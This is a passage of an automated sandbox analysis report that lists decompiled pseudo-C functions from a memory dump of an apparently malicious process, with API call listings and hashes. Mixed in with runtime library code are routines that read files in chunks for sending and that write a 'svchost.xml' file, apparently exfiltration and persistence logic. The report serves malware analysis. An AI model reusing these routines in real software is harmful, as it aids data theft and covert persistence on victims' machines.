                                                																	if( *_t114 != 0) {
                                                																		continue;
                                                																	} else {
                                                																		goto L15;
                                                																	}
                                                																}
                                                																goto L63;
                                                															}
                                                														}
                                                													}
                                                													goto L15;
                                                												}
                                                											} else {
                                                												_t92 = 2;
                                                												if(_v28 >= _t92) {
                                                													_t115 =  &_v22;
                                                													if(_v22 != 0) {
                                                														while(1) {
                                                															_t123 =  *((intOrPtr*)(_t115 + 1));
                                                															if(_t123 == 0) {
                                                																goto L17;
                                                															}
                                                															_t102 =  *_t125;
                                                															if(_t102 <  *_t115 || _t102 > _t123) {
                                                																_t115 = _t115 + _t92;
                                                																if( *_t115 != 0) {
                                                																	continue;
                                                																} else {
                                                																	goto L17;
                                                																}
                                                															}
                                                															goto L63;
                                                														}
                                                													}
                                                												}
                                                												goto L17;
                                                											}
                                                										}
                                                									} else {
                                                										L17:
                                                										_push(3);
                                                										goto L13;
                                                									}
                                                								} else {
                                                									L15:
                                                								}
                                                							} else {
                                                								_push(2);
                                                								L13:
                                                							}
                                                						} else {
                                                							L36:
                                                							_t126 = 0;
                                                							_t72 = MultiByteToWideChar(_a32, 9, _v36, _t127, 0, 0);
                                                							_v44 = _t72;
                                                							if(_t72 == 0) {
                                                								L5:
                                                							} else {
                                                								_t120 = _t72 + _t72;
                                                								asm("sbb eax, eax");
                                                								if((_t120 + 0x00000008 & _t72) == 0) {
                                                									_t73 = 0;
                                                									_v32 = 0;
                                                									goto L45;
                                                								} else {
                                                									asm("sbb eax, eax");
                                                									_t85 = _t72 & _t120 + 0x00000008;
                                                									_t112 = _t120 + 8;
                                                									if((_t72 & _t120 + 0x00000008) > 0x400) {
                                                										asm("sbb eax, eax");
                                                										_t87 = E02877882(_t112, _t85 & _t112);
                                                										_v32 = _t87;
                                                										if(_t87 == 0) {
                                                											goto L61;
                                                										} else {
                                                											 *_t87 = 0xdddd;
                                                											goto L43;
                                                										}
                                                									} else {
                                                										asm("sbb eax, eax");
                                                										E02883C70();
                                                										_t87 = _t129;
                                                										_v32 = _t87;
                                                										if(_t87 == 0) {
                                                											L61:
                                                											_t100 = _v32;
                                                										} else {
                                                											 *_t87 = 0xcccc;
                                                											L43:
                                                											_t73 =  &(_t87[4]);
                                                											_v32 = _t73;
                                                											L45:
                                                											if(_t73 == 0) {
                                                												goto L61;
                                                											} else {
                                                												_t127 = _a32;
                                                												if(MultiByteToWideChar(_t127, 1, _v36, _t127, _t73, _v44) == 0) {
                                                													goto L61;
                                                												} else {
                                                													_t77 = MultiByteToWideChar(_t127, 9, _v40, _t99, _t126, _t126);
                                                													_v36 = _t77;
                                                													if(_t77 == 0) {
                                                														goto L61;
                                                													} else {
                                                														_t121 = _t77 + _t77;
                                                														_t108 = _t121 + 8;
                                                														asm("sbb eax, eax");
                                                														if((_t121 + 0x00000008 & _t77) == 0) {
                                                															_t127 = _t126;
                                                															goto L56;
                                                														} else {
                                                															asm("sbb eax, eax");
                                                															_t81 = _t77 & _t121 + 0x00000008;
                                                															_t108 = _t121 + 8;
                                                															if((_t77 & _t121 + 0x00000008) > 0x400) {
                                                																asm("sbb eax, eax");
                                                																_t127 = E02877882(_t108, _t81 & _t108);
                                                																_pop(_t108);
                                                																if(_t127 == 0) {
                                                																	goto L59;
                                                																} else {
                                                																	 *_t127 = 0xdddd;
                                                																	goto L54;
                                                																}
                                                															} else {
                                                																asm("sbb eax, eax");
                                                																E02883C70();
                                                																_t127 = _t129;
                                                																if(_t127 == 0) {
                                                																	L59:
                                                																	_t100 = _v32;
                                                																} else {
                                                																	 *_t127 = 0xcccc;
                                                																	L54:
                                                																	_t127 =  &(_t127[4]);
                                                																	L56:
                                                																	if(_t127 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t99, _t127, _v36) == 0) {
                                                																		goto L59;
                                                																	} else {
                                                																		_t100 = _v32;
                                                																		_t126 = E02877DA7(_t108, _v48, _a12, _v32, _v44, _t127, _v36, _t126, _t126, _t126);
                                                																	}
                                                																}
                                                															}
                                                														}
                                                														E0287A677(_t127);
                                                													}
                                                												}
                                                											}
                                                										}
                                                									}
                                                								}
                                                								E0287A677(_t100);
                                                							}
                                                						}
                                                					}
                                                				}
                                                				L63:
                                                				return E02870A5D(_v8 ^ _t128, _t127);
                                                			}


                                                APIs
                                                • GetCPInfo.KERNEL32(?,?,?,7FFFFFFF,?,?,02881CE2,?,?,?,?,?,?,?,?,?), ref: 02881AB5
                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,?,02881CE2,?,?,?,?,?,?,?,?), ref: 02881B38
                                                • __alloca_probe_16.LIBCMT ref: 02881B70
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,02881CE2,?,02881CE2,?,?,?,?,?,?,?,?), ref: 02881BCB
                                                • __alloca_probe_16.LIBCMT ref: 02881C1A
                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,?,02881CE2,?,?,?,?,?,?,?,?), ref: 02881BE2
                                                  • Part of subcall function 02877882: HeapAlloc.KERNEL32(00000000,77109EB0,00000000,?,02870A9A,77109EB0,?,02869C60,00000100,?,77109EB0), ref: 028778B4
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,02881CE2,?,?,?,?,?,?,?,?), ref: 02881C5E
                                                • __freea.LIBCMT ref: 02881C89
                                                • __freea.LIBCMT ref: 02881C95
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocHeapInfo
                                                • String ID:
                                                • API String ID: 3256262068-0
                                                • Opcode ID: 444c5494737ee4474bb4970fdb2a930b1d9d6cca6ebbc16342038abddc137b5a
                                                • Instruction ID: 26b4470f0efbfa1916145e66e2b336d5df42deca487863ed763a72f897029aaf
                                                • Opcode Fuzzy Hash: 444c5494737ee4474bb4970fdb2a930b1d9d6cca6ebbc16342038abddc137b5a
                                                • Instruction Fuzzy Hash: 5B91D67DE002169EEB24AE68CC88AFE7BB6AF05754F144559E90DE7180EF35DC42CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 90%
                                                			E02868BB0(void* __ebx, intOrPtr* __ecx, void* __edi, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
                                                				long _v8;
                                                				char _v16;
                                                				signed int _v20;
                                                				char _v24;
                                                				char _v28;
                                                				void* _v32;
                                                				struct _CRITICAL_SECTION _v56;
                                                				long _v60;
                                                				long _v64;
                                                				void* _v68;
                                                				char _v72;
                                                				long _v76;
                                                				void* __esi;
                                                				signed int _t63;
                                                				signed int _t64;
                                                				void* _t67;
                                                				void* _t75;
                                                				void* _t82;
                                                				void* _t90;
                                                				void* _t92;
                                                				void* _t95;
                                                				void* _t98;
                                                				void* _t100;
                                                				intOrPtr* _t112;
                                                				void* _t113;
                                                				void* _t115;
                                                				intOrPtr _t117;
                                                				intOrPtr* _t124;
                                                				signed char* _t135;
                                                				intOrPtr* _t139;
                                                				intOrPtr _t142;
                                                				void* _t146;
                                                				struct _CRITICAL_SECTION* _t147;
                                                				signed int _t148;
                                                				void* _t149;
                                                				void* _t150;
                                                				void* _t151;
                                                
                                                				_push(0xffffffff);
                                                				_push(E02884728);
                                                				_push( *[fs:0x0]);
                                                				_t150 = _t149 - 0x3c;
                                                				_t63 =  *0x288f008; // 0xe7fe870c
                                                				_t64 = _t63 ^ _t148;
                                                				_v20 = _t64;
                                                				_push(_t64);
                                                				 *[fs:0x0] =  &_v16;
                                                				_t145 = __ecx;
                                                				_t117 = _a12;
                                                				_t142 = _a4;
                                                				_t139 = _a8;
                                                				if(_t117 != 0) {
                                                					__eflags = _t117 - 5;
                                                					if(_t117 != 5) {
                                                						L5:
                                                						E02868690(_t142, _t139, _t117);
                                                						_t67 = E028687A0(_t142);
                                                						__eflags = _t67 - 0xd;
                                                						if(_t67 > 0xd) {
                                                							while(1) {
                                                								_t112 =  *((intOrPtr*)(_t142 + 4));
                                                								_t124 =  &_v28;
                                                								_v28 =  *_t112;
                                                								_v24 =  *((intOrPtr*)(_t112 + 4));
                                                								__eflags =  *((intOrPtr*)(_t145 + 0x214)) -  *_t124;
                                                								if( *((intOrPtr*)(_t145 + 0x214)) !=  *_t124) {
                                                									break;
                                                								}
                                                								__eflags = ( *(_t145 + 0x218) & 0x000000ff) -  *((intOrPtr*)(_t124 + 4));
                                                								if(( *(_t145 + 0x218) & 0x000000ff) !=  *((intOrPtr*)(_t124 + 4))) {
                                                									break;
                                                								} else {
                                                									_t113 =  *(_t112 + 5);
                                                									_v32 = _t113;
                                                									__eflags = _t113;
                                                									if(_t113 != 0) {
                                                										_t126 = _t142;
                                                										_t75 = E028687A0(_t142);
                                                										__eflags = _t75 - _t113;
                                                										if(_t75 >= _t113) {
                                                											_v76 = 0;
                                                											E02868700(_t126,  &_v28, 5);
                                                											E02868700(_t142,  &_v32, 4);
                                                											E02868700(_t142,  &_v76, 4);
                                                											_t115 = _v32 + 0xfffffff3;
                                                											_push(_t115);
                                                											_t82 = E02870AB4(_t145, __eflags);
                                                											_t151 = _t150 + 4;
                                                											_v32 = _t82;
                                                											E02868700(_t142, _t82, _t115);
                                                											_v72 = 0x288cab8;
                                                											_v60 = 0;
                                                											_v68 = 0;
                                                											_v64 = 0;
                                                											InitializeCriticalSection( &_v56);
                                                											_v8 = 0;
                                                											EnterCriticalSection( &_v56);
                                                											_v64 = _v68;
                                                											E02868840( &_v72, 0x400);
                                                											LeaveCriticalSection( &_v56);
                                                											EnterCriticalSection( &_v56);
                                                											_t90 = _v68;
                                                											__eflags = _t90;
                                                											_t133 =  ==  ? 0 : _v64 - _t90;
                                                											_t92 = E028687B0( &_v72, ( ==  ? 0 : _v64 - _t90) + _t115);
                                                											__eflags = _t92 - 0xffffffff;
                                                											if(_t92 != 0xffffffff) {
                                                												E02883DB0(_v64, _v32, _t115);
                                                												_t151 = _t151 + 0xc;
                                                												_t44 =  &_v64;
                                                												 *_t44 = _v64 + _t115;
                                                												__eflags =  *_t44;
                                                											}
                                                											LeaveCriticalSection( &_v56);
                                                											_t135 = _v68;
                                                											_t95 = ( *_t135 & 0x000000ff) - 0x34;
                                                											__eflags = _t95;
                                                											if(_t95 == 0) {
                                                												L16:
                                                												E028688D0(_t145);
                                                											} else {
                                                												__eflags = _t95 == 1;
                                                												if(_t95 == 1) {
                                                													 *(_t145 + 0xc) = _t135[8];
                                                													 *(_t145 + 8) = _t135[4];
                                                													goto L16;
                                                												}
                                                											}
                                                											E02870AAF(_v32);
                                                											_v8 = 0xffffffff;
                                                											_t150 = _t151 + 4;
                                                											_t98 = _v68;
                                                											_v72 = 0x288cab8;
                                                											__eflags = _t98;
                                                											if(_t98 != 0) {
                                                												VirtualFree(_t98, 0, 0x8000);
                                                											}
                                                											DeleteCriticalSection( &_v56);
                                                											_t100 = E028687A0(_t142);
                                                											__eflags = _t100 - 0xd;
                                                											if(_t100 > 0xd) {
                                                												continue;
                                                											} else {
                                                											}
                                                										}
                                                									}
                                                								}
                                                								goto L22;
                                                							}
                                                							_t147 = _t142 + 0x10;
                                                							EnterCriticalSection(_t147);
                                                							 *((intOrPtr*)(_t142 + 8)) =  *((intOrPtr*)(_t142 + 4));
                                                							E02868840(_t142, 0x400);
                                                							LeaveCriticalSection(_t147);
                                                						}
                                                					} else {
                                                						__eflags =  *_t139 -  *((intOrPtr*)(__ecx + 0x214));
                                                						if( *_t139 !=  *((intOrPtr*)(__ecx + 0x214))) {
                                                							goto L5;
                                                						} else {
                                                							__eflags = ( *(_t139 + 4) & 0x000000ff) -  *((intOrPtr*)(__ecx + 0x218));
                                                							if(( *(_t139 + 4) & 0x000000ff) !=  *((intOrPtr*)(__ecx + 0x218))) {
                                                								goto L5;
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					 *((intOrPtr*)( *((intOrPtr*)( *__ecx)) + 0x18))();
                                                				}
                                                				L22:
                                                				 *[fs:0x0] = _v16;
                                                				_pop(_t146);
                                                				return E02870A5D(_v20 ^ _t148, _t146);
                                                			}

                                                APIs
                                                • InitializeCriticalSection.KERNEL32(?,00000000), ref: 02868CE3
                                                • EnterCriticalSection.KERNEL32(?), ref: 02868CF4
                                                • LeaveCriticalSection.KERNEL32(?,00000400), ref: 02868D11
                                                • EnterCriticalSection.KERNEL32(?), ref: 02868D1B
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: CriticalSection$Enter$InitializeLeave
                                                • String ID:
                                                • API String ID: 2951591641-0
                                                • Opcode ID: 4c2aae1e6f4cf7256257a4fdd6b3025f1b8738022a442526c7b2cf163d4c76b6
                                                • Instruction ID: e7fc82af24160bfa82adfb7ac1d5ede1356d43b1b7cdf5e385079120359614ff
                                                • Opcode Fuzzy Hash: 4c2aae1e6f4cf7256257a4fdd6b3025f1b8738022a442526c7b2cf163d4c76b6
                                                • Instruction Fuzzy Hash: D46162BDE002099BCB14DFA8D898BBEBBB6FF45314F144519E519E7280DB34A909CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E028688D0(intOrPtr* __ecx) {
                                                				intOrPtr* _v8;
                                                				long _v12;
                                                				long _v16;
                                                				struct _SECURITY_ATTRIBUTES* _t34;
                                                				CHAR* _t36;
                                                				void* _t37;
                                                				intOrPtr _t39;
                                                				intOrPtr* _t41;
                                                				void* _t43;
                                                				struct _SECURITY_ATTRIBUTES* _t44;
                                                				long _t45;
                                                
                                                				_t44 = 0;
                                                				_t36 = __ecx + 0x110;
                                                				_v8 = __ecx;
                                                				_t43 = CreateFileA(_t36, 0x80000000, 1, 0, 3, 0x80, 0);
                                                				if(_t43 != 0xffffffff) {
                                                					L3:
                                                					_t39 = _v8;
                                                					_t4 = _t39 + 8; // 0x2868e40
                                                					_t5 = _t39 + 0xc; // 0x2868ec0
                                                					_t45 =  *_t5;
                                                					_v12 =  *_t4;
                                                					SetFilePointer(_t43, _t45,  &_v12, 0);
                                                					_t37 = LocalAlloc(0x40, 0x19000);
                                                					_t9 = _t37 + 9; // 0x9
                                                					 *_t37 = 0x33;
                                                					 *((intOrPtr*)(_t37 + 1)) = _v12;
                                                					 *(_t37 + 5) = _t45;
                                                					_v16 = 0;
                                                					ReadFile(_t43, _t9, 0x18ff7,  &_v16, 0);
                                                					CloseHandle(_t43);
                                                					_t27 = _v16;
                                                					_t41 = _v8;
                                                					if(_v16 == 0) {
                                                						 *((intOrPtr*)( *((intOrPtr*)( *_t41)) + 0x18))();
                                                						return LocalFree(_t37);
                                                					}
                                                					E02868A40(_t41, _t27 + 9, _t37, _t27 + 9);
                                                					return LocalFree(_t37);
                                                				} else {
                                                					while(1) {
                                                						_t34 = _t44;
                                                						_t44 =  &(_t44->nLength);
                                                						if(_t34 > 0xa) {
                                                							break;
                                                						}
                                                						Sleep(0x12c);
                                                						_t43 = CreateFileA(_t36, 0x80000000, 1, 0, 3, 0x80, 0);
                                                						if(_t43 == 0xffffffff) {
                                                							continue;
                                                						} else {
                                                							goto L3;
                                                						}
                                                						goto L7;
                                                					}
                                                					return _t34;
                                                				}
                                                				L7:
                                                			}

                                                APIs
                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,02884635,?,02868D80), ref: 028688F7
                                                • Sleep.KERNEL32(0000012C,?,02868D80), ref: 02868915
                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,02868D80), ref: 0286892E
                                                • SetFilePointer.KERNEL32(00000000,02868EC0,02868D80,00000000,?,02868D80), ref: 0286894F
                                                • LocalAlloc.KERNEL32(00000040,00019000,?,02868D80), ref: 0286895C
                                                • ReadFile.KERNEL32(00000000,00000009,00018FF7,?,00000000), ref: 02868987
                                                • CloseHandle.KERNEL32(00000000), ref: 0286898E
                                                • LocalFree.KERNEL32(00000000,00000000,-00000009), ref: 028689A9
                                                • LocalFree.KERNEL32(00000000), ref: 028689BE
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: File$Local$CreateFree$AllocCloseHandlePointerReadSleep
                                                • String ID:
                                                • API String ID: 2044486136-0
                                                • Opcode ID: cf155d13d74f3660d6643ed024228137677682ed7ec930f444f4a8ea49f1b4a0
                                                • Instruction ID: 52beefca6c54ec9ca0159b1986021138fb2cb6501e18b1c94f026b40f3bb2132
                                                • Opcode Fuzzy Hash: cf155d13d74f3660d6643ed024228137677682ed7ec930f444f4a8ea49f1b4a0
                                                • Instruction Fuzzy Hash: 2B31C87DA80204BFD710DB68DC89FBA7B7CEB09721F104555FA09EB2C0D6749511CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E02868A40(void* __ecx, void* __eflags, intOrPtr _a4, char _a8) {
                                                				long _v8;
                                                				char _v16;
                                                				char _v20;
                                                				struct _CRITICAL_SECTION _v44;
                                                				long _v48;
                                                				long _v52;
                                                				void* _v56;
                                                				char _v60;
                                                				signed int _t45;
                                                				char _t53;
                                                				void* _t60;
                                                				void* _t84;
                                                				void* _t96;
                                                				void* _t100;
                                                				signed int _t102;
                                                
                                                				_push(0xffffffff);
                                                				_push(E028846F8);
                                                				_push( *[fs:0x0]);
                                                				_t45 =  *0x288f008; // 0xe7fe870c
                                                				_push(_t45 ^ _t102);
                                                				 *[fs:0x0] =  &_v16;
                                                				_t96 = __ecx;
                                                				_v60 = 0x288cab8;
                                                				_v48 = 0;
                                                				_v56 = 0;
                                                				_v52 = 0;
                                                				InitializeCriticalSection( &_v44);
                                                				_v8 = 0;
                                                				EnterCriticalSection( &_v44);
                                                				_v52 = _v56;
                                                				E02868840( &_v60, 0x400);
                                                				LeaveCriticalSection( &_v44);
                                                				_t53 = _a8;
                                                				if(_t53 == 0 || _a4 == 0) {
                                                					EnterCriticalSection( &_v44);
                                                					_t28 = ( ==  ? 0 : _v52 - _v56) + 5; // 0x5
                                                					if(E028687B0( &_v60, _t28) != 0xffffffff) {
                                                						_t31 = _t96 + 0x214; // 0x2a0073
                                                						 *_v52 =  *_t31;
                                                						_t33 = _t96 + 0x218; // 0x0
                                                						 *((char*)(_v52 + 4)) =  *_t33;
                                                						_v52 = _v52 + 5;
                                                					}
                                                					LeaveCriticalSection( &_v44);
                                                				} else {
                                                					_v20 = _t53 + 0xd;
                                                					_t17 = _t96 + 0x214; // 0x288cccc
                                                					E02868690( &_v60, _t17, 5);
                                                					E02868690( &_v60,  &_v20, 4);
                                                					E02868690( &_v60,  &_a8, 4);
                                                					E02868690( &_v60, _a4, _a8);
                                                				}
                                                				_t82 =  ==  ? 0 : _v52 - _v56;
                                                				_push( ==  ? 0 : _v52 - _v56);
                                                				_t60 = E028689D0(_t96, _v56,  ==  ? 0 : _v52 - _v56);
                                                				_t84 = _v56;
                                                				_t100 = _t60;
                                                				_v60 = 0x288cab8;
                                                				if(_t84 != 0) {
                                                					VirtualFree(_t84, 0, 0x8000);
                                                				}
                                                				DeleteCriticalSection( &_v44);
                                                				 *[fs:0x0] = _v16;
                                                				return _t100;
                                                 			}

                                                APIs
                                                • InitializeCriticalSection.KERNEL32(?), ref: 02868A89
                                                • EnterCriticalSection.KERNEL32(?), ref: 02868A9A
                                                • LeaveCriticalSection.KERNEL32(?,00000400), ref: 02868ABD
                                                • EnterCriticalSection.KERNEL32(?), ref: 02868B13
                                                • LeaveCriticalSection.KERNEL32(?,00000005), ref: 02868B58
                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00000000), ref: 02868B8B
                                                • DeleteCriticalSection.KERNEL32(?,00000000,00000000,00000000), ref: 02868B95
                                                  • Part of subcall function 02868690: EnterCriticalSection.KERNEL32(?,?,?,?,?,02868C1E,?,02867B57,E7FE870C,73B76490,00000000,?), ref: 0286869C
                                                  • Part of subcall function 02868690: LeaveCriticalSection.KERNEL32(?,?,?,02868C1E,?,02867B57,E7FE870C,73B76490,00000000,?), ref: 028686C5
                                                  • Part of subcall function 02868690: LeaveCriticalSection.KERNEL32(?,73B76490,00000000,?,?,?,?,?,?,?,?,?,02884728,000000FF,?,02867B57), ref: 028686E7
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: CriticalSection$Leave$Enter$DeleteFreeInitializeVirtual
                                                • String ID:
                                                • API String ID: 2514474324-0
                                                • Opcode ID: 715171d940395fe83687cbf0d5ba38276d88e7def1c0ae272999ec0adca98522
                                                • Instruction ID: 9f5e41c2a6d2c245e3e47836655381ded6c56990dceb3a6d9847c3d956b51094
                                                • Opcode Fuzzy Hash: 715171d940395fe83687cbf0d5ba38276d88e7def1c0ae272999ec0adca98522
                                                • Instruction Fuzzy Hash: 0941EF79A00209ABDF04DFA8D898BEEBBB9FF18314F15451AF519E7280DB74A508CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 68%
                                                			E02873060(void* __ebx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                				char _v5;
                                                				signed int _v12;
                                                				char _v16;
                                                				intOrPtr _v20;
                                                				intOrPtr _v24;
                                                				intOrPtr _v28;
                                                				long _v32;
                                                				WCHAR* _v36;
                                                				struct HINSTANCE__* _v40;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* _t54;
                                                				long _t56;
                                                				signed int _t62;
                                                				intOrPtr _t63;
                                                				void* _t64;
                                                				intOrPtr _t67;
                                                				long _t69;
                                                				intOrPtr _t72;
                                                				intOrPtr _t74;
                                                				signed int _t76;
                                                				char _t78;
                                                				void* _t90;
                                                				intOrPtr _t91;
                                                				WCHAR* _t93;
                                                				intOrPtr _t96;
                                                				long _t98;
                                                				intOrPtr* _t100;
                                                				void* _t103;
                                                				void* _t104;
                                                				void* _t110;
                                                
                                                				_t72 = _a8;
                                                				_push(_t90);
                                                				_v5 = 0;
                                                				_t96 = _t72 + 0x10;
                                                				_push(_t96);
                                                				_v16 = 1;
                                                				_v20 = _t96;
                                                				_v12 =  *(_t72 + 8) ^  *0x288f008;
                                                				_t54 = E02873020(_t90, _t96,  *(_t72 + 8) ^  *0x288f008);
                                                				_t91 = _a12;
                                                				_push(_t91);
                                                				E02871802(_t54);
                                                				_t56 = _a4;
                                                				_t104 = _t103 + 0xc;
                                                				if(( *(_t56 + 4) & 0x00000066) != 0) {
                                                					__eflags =  *((intOrPtr*)(_t72 + 0xc)) - 0xfffffffe;
                                                					if( *((intOrPtr*)(_t72 + 0xc)) != 0xfffffffe) {
                                                						E02874097(_t72, 0xfffffffe, _t96, 0x288f008);
                                                						goto L18;
                                                					}
                                                					goto L19;
                                                				} else {
                                                					_v32 = _t56;
                                                					_v28 = _t91;
                                                					_t91 =  *((intOrPtr*)(_t72 + 0xc));
                                                					 *((intOrPtr*)(_t72 - 4)) =  &_v32;
                                                					if(_t91 == 0xfffffffe) {
                                                						L19:
                                                						return _v16;
                                                					} else {
                                                						do {
                                                							_t76 = _v12;
                                                							_t19 = _t91 + 2; // 0x3
                                                							_t62 = _t91 + _t19 * 2;
                                                							_t74 =  *((intOrPtr*)(_t76 + _t62 * 4));
                                                							_t63 = _t76 + _t62 * 4;
                                                							_t77 =  *((intOrPtr*)(_t63 + 4));
                                                							_v24 = _t63;
                                                							if( *((intOrPtr*)(_t63 + 4)) == 0) {
                                                								_t78 = _v5;
                                                								goto L12;
                                                							} else {
                                                								_t64 = E0287404E(_t77, _t96);
                                                								_t78 = 1;
                                                								_v5 = 1;
                                                								_t110 = _t64;
                                                								if(_t110 < 0) {
                                                									_v16 = 0;
                                                									L18:
                                                									_push(_t96);
                                                									E02873020(_t91, _t96, _v12);
                                                									goto L19;
                                                								} else {
                                                									if(_t110 <= 0) {
                                                										goto L12;
                                                									} else {
                                                										_t65 = _a4;
                                                										if( *_a4 == 0xe06d7363) {
                                                											_t112 =  *0x28855dc;
                                                											if( *0x28855dc != 0) {
                                                												_t65 = E02883930(_t112, 0x28855dc);
                                                												_t104 = _t104 + 4;
                                                												if(_t65 != 0) {
                                                													_t100 =  *0x28855dc; // 0x2871e94
                                                													L0287162B();
                                                													_t65 =  *_t100(_a4, 1);
                                                													_t96 = _v20;
                                                													_t104 = _t104 + 8;
                                                												}
                                                											}
                                                										}
                                                										E0287407E(_t65, _a8, _a4);
                                                										_t67 = _a8;
                                                										if( *((intOrPtr*)(_t67 + 0xc)) != _t91) {
                                                											E02874097(_t67, _t91, _t96, 0x288f008);
                                                											_t67 = _a8;
                                                										}
                                                										_push(_t96);
                                                										 *((intOrPtr*)(_t67 + 0xc)) = _t74;
                                                										E02873020(_t91, _t96, _v12);
                                                										E02874065();
                                                										asm("int3");
                                                										_push(_t96);
                                                										_t98 = _v32;
                                                										_push(_t91);
                                                										_t93 = _v36;
                                                										_t69 = GetModuleFileNameW(_v40, _t93, _t98);
                                                										if(_t98 != 0) {
                                                											if(_t69 == 0) {
                                                												 *_t93 = 0;
                                                											}
                                                											if(_t69 == _t98) {
                                                												_t69 = GetLastError();
                                                												if(_t69 == 0) {
                                                													 *(_t93 + _t98 * 2 - 2) = _t69;
                                                												}
                                                											}
                                                										}
                                                										return _t69;
                                                									}
                                                								}
                                                							}
                                                							goto L29;
                                                							L12:
                                                							_t91 = _t74;
                                                							__eflags = _t74 - 0xfffffffe;
                                                						} while (_t74 != 0xfffffffe);
                                                						__eflags = _t78;
                                                						if(_t78 != 0) {
                                                							goto L18;
                                                						}
                                                						goto L19;
                                                					}
                                                				}
                                                				L29:
                                                 			}

                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 0287308B
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 02873105
                                                  • Part of subcall function 02883930: __FindPESection.LIBCMT ref: 02883989
                                                • _ValidateLocalCookies.LIBCMT ref: 02873179
                                                • _ValidateLocalCookies.LIBCMT ref: 028731A4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: CookiesLocalValidate$CurrentFindImageNonwritableSection
                                                • String ID: csm
                                                • API String ID: 1685366865-1018135373
                                                • Opcode ID: f6b3637652acb929650ba643a894dd4082131caf820600ca389c2d705eb30407
                                                • Instruction ID: 287dc06842a97527f322fa151c407895ea061feacf9231173d1582de3e4a5803
                                                • Opcode Fuzzy Hash: f6b3637652acb929650ba643a894dd4082131caf820600ca389c2d705eb30407
                                                • Instruction Fuzzy Hash: 5541B73DE00208ABCF10DF6CC884A9EBBB5AF45328F148195E819EB351D735DA55DFA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 69%
                                                			E028672D0(void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr _a4) {
                                                				signed int _v8;
                                                				char _v268;
                                                				void _v102668;
                                                				long _v102672;
                                                				void* __esi;
                                                				signed int _t16;
                                                				intOrPtr _t26;
                                                				int _t33;
                                                				void* _t39;
                                                				void* _t43;
                                                				intOrPtr _t50;
                                                				void* _t51;
                                                				void* _t55;
                                                				intOrPtr* _t56;
                                                				long _t57;
                                                				void* _t58;
                                                				void* _t59;
                                                				signed int _t60;
                                                
                                                				E02883CA0();
                                                				_t16 =  *0x288f008; // 0xe7fe870c
                                                				_v8 = _t16 ^ _t60;
                                                				_t50 = _a4;
                                                				_t39 = __edx;
                                                				_t55 = __ecx;
                                                				E02873440(_t50,  &_v268, 0, 0x104);
                                                				E02865180( &_v268, 0x104, "%s\\svchost.xml", _t55);
                                                				E02873440(_t50,  &_v102668, 0, 0x19000);
                                                				_push(_t50);
                                                				E02865180( &_v102668, 0x19000,  *0x289682c, _t39);
                                                				_t56 =  &_v102668;
                                                				_t43 = _t56 + 1;
                                                				do {
                                                					_t26 =  *_t56;
                                                					_t56 = _t56 + 1;
                                                				} while (_t26 != 0);
                                                				_v102672 = 0;
                                                				_t57 = _t56 - _t43;
                                                				_t51 = CreateFileA( &_v268, 0x40000000, 2, 0, 2, 0x80, 0);
                                                				if(_t51 == 0) {
                                                					L5:
                                                					_pop(_t58);
                                                					return E02870A5D(_v8 ^ _t60, _t58);
                                                				} else {
                                                					_t33 = WriteFile(_t51,  &_v102668, _t57,  &_v102672, 0);
                                                					_push(_t51);
                                                					if(_t33 != 0) {
                                                						CloseHandle();
                                                						_pop(_t59);
                                                						return E02870A5D(_v8 ^ _t60, _t59);
                                                					} else {
                                                						CloseHandle();
                                                						goto L5;
                                                					}
                                                				}
                                                 			}

                                                APIs
                                                • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0286737F
                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0286739D
